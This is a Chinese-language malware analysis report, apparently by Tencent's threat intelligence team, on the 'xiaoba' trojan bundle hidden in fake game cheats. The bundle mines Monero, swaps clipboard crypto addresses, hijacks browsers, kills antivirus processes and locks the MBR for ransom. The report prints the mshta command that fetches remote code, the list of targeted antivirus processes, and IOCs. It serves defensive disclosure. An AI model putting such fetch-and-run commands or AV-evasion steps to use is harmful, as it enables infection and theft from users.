装游戏辅助本想吃鸡,中挖矿病毒卡到死机

近日,腾讯御见威胁情报中心监控到“xiaoba”勒索病毒的作者在网站xiaobaruanjian.xyz上提供荒野行动游戏辅助,同时将勒索病毒、挖矿木马、篡改主页木马暗藏在其中,一旦下载运行了该网站的所谓吃鸡“辅助”软件,会导致浏览器主页被篡改、电脑CPU被大量占用挖矿。

0×1 背景

近日,腾讯御见威胁情报中心监控到“xiaoba”勒索病毒的作者在网站xiaobaruanjian.xyz上提供荒野行动游戏辅助,同时将勒索病毒、挖矿木马、篡改主页木马暗藏在其中,一旦下载运行了该网站的所谓吃鸡“辅助”软件,会导致浏览器主页被篡改、电脑CPU被大量占用挖矿。

如果碰巧遇到中毒电脑有比特币、以太坊交易,病毒还会监视剪切板,当中毒电脑上发生比特币、以太坊币交易时,病毒会在交易瞬间将收款人地址替换为自己的,从而实现虚拟币交易抢劫。

更恶劣的是,xiaoba病毒作者还增加了勒索病毒功能,会改写硬盘主引导记录(MBR),让电脑无法开机,要求受害人加QQ聊天付款后才能解除病毒封锁。

1.jpg

0×2 荒野行动设备解封工具.exe

伪装成吃鸡游戏辅助工具的“荒野行动设备解封工具.cmd”,被打包为压缩包文件“荒野行动设备解封工具.exe”,该压缩包文件执行时会启动恶意脚本cmd。

2.png

“荒野行动设备解封工具.cmd”执行命令mshta.exe hxxp://xiaobaruanjian.xyz/XiaoBa/office 

3.png

hxxp://xiaobaruanjian.xyz/XiaoBa/office下载木马exe,木马伪装正规软件文件名。

4.png

木马运行后创建傀儡进程svchost.exe

5.png

木马从自身资源中获取PE ,然后将其写入傀儡进程

6.png

傀儡进程执行恶意代码,下载木马到Temp目录,修改文件创建时间,然后执行木马文件。

7.png

木马的各个子模块文件下载地址皆以base64加密形式保存在代码中,木马运行时解码出对应的URL,下载文件并启动进程。URL、进程、文件以及功能对应如下:

8.png

木马运行时的http请求

9.png

0×3 挖矿

10.png

矿池一:emergency.fee.xmrig.com 

钱包一:48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD 

钱包状态:

11.png

12.png

矿池二:mine.ppxxmr.com:5555 

钱包二:47XDhdPop9CMqSxnZsZv2ze9bg7HjxUx1YorwGCP5bqw4XBKGd6jWCA5rXV8XsJLNsaedqW1XjxvfQWg7tFV5wZWP66su1j

挖矿状态:

13.png

检测杀毒软件,发现存在杀毒软件进程则向驱动EDriver.sys发送IOCTL码

14.png

尝试在驱动层结束杀软进程

0628.png

以下杀软进程会受影响:

360Safe.exe

ZhuDongFangYu.exe

QQPCTary.exe

kxetray.exe

2345safe.exe

BaiduSDTray.exe

avp.exe

360sd.exe

360rp.exe 

0×4 推广网址导航站

篡改浏览器导航为hxxp://t.cn/Rmrtj7O 

15.png

病毒会针对以下浏览器进行劫持

06281.png

释放带某导航的桌面lnk

16.png

木马运行后在桌面释放大量推广lnk,同时挖矿占用大量CPU资源

17.jpg

0×5 替换钱包地址

当检测到复制钱包地址的操作时,会用病毒作者自己的钱包地址去替换目标转帐地址,实现虚拟币钱包打劫。

替换比特币地址

18.png

替换以太坊地址

19.png

0×6 绝地求生超强辅助.exe

勒索

修改MBR锁定计算机

20.png

勒索提示

It’s time to pay the money. Your computer is locked for special reasons.Contact QQ:3047861776 Get unlocked method, Your ID:

中文翻译:是时候付钱了,你的电脑因特殊原因被锁定。联系QQ:3047861776获取解锁方法。

21.png

发送被勒索机器ID到hxxp://xiaobaruanjian.xyz/MBR/pass.php 

22.png

0×7 总结

黑客“xiaoba”以制作投放“xiaoba”勒索病毒出名,在网上一直使用QQ号:3047861776。

此次将挖矿,勒索等木马同时植入“吃鸡”类游戏外挂中进行传播,增加了受到攻击后的危害种类。

木马作者公开建议使用者关闭杀毒软件,在这种情况下,荒野行动、绝地求生等“吃鸡”游戏玩家如果喜欢使用外挂,则有很高的几率中招。

23.png

0×8 安全建议

1、 不使用来历不明的软件。因外挂程序带毒的比例远高于其他软件,游戏玩家应尽量不要使用外挂程序。

2、 从网上下载的软件先使用腾讯电脑管家扫描。

3、 玩游戏时,保持腾讯电脑管家为开启状态。

24.png

0×9 IOCs

域名

xiaobaruanjian.xyz

url

hxxp://xiaobaruanjian.xyz/xiaoba/lsass.png

hxxp://xiaobaruanjian.xyz/xiaoba/runtimebroker.png

hxxp://xiaobaruanjian.xyz/xiaoba/svchost.png

hxxp://xiaobaruanjian.xyz/xiaoba/psok.hta

hxxp://xiaobaruanjian.xyz/XiaoBa/office 

hxxp://xiaobaruanjian.xyz/XiaoBa/RuntimeBroker.png

hxxp://xiaobaruanjian.xyz/XMR/xmrig32.png

hxxp://xiaobaruanjian.xyz/XMR/xmrig64.png

hxxp://xiaobaruanjian.xyz/XMR/config.txt

hxxp://xiaobaruanjian.xyz/MBR/pass.php

md5

7a936398ad04fae4458be48d8bc339d0

1df1f79ea710eca9768f3013a0051e05

2786b62a6e2f288f5c24446068c9fc87

f3fe4dbe88bd0549c665ece769c44f17

d62d111eeb9e59dfe4c10e58fe4a75a8

1b737bf07f69ad9081c12ce0bbddb762

7f9e74895018870fe667438337b4eeee

8b32838c7d458c24299b3aa294262f2f 

取消
Loading...

相关推荐

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php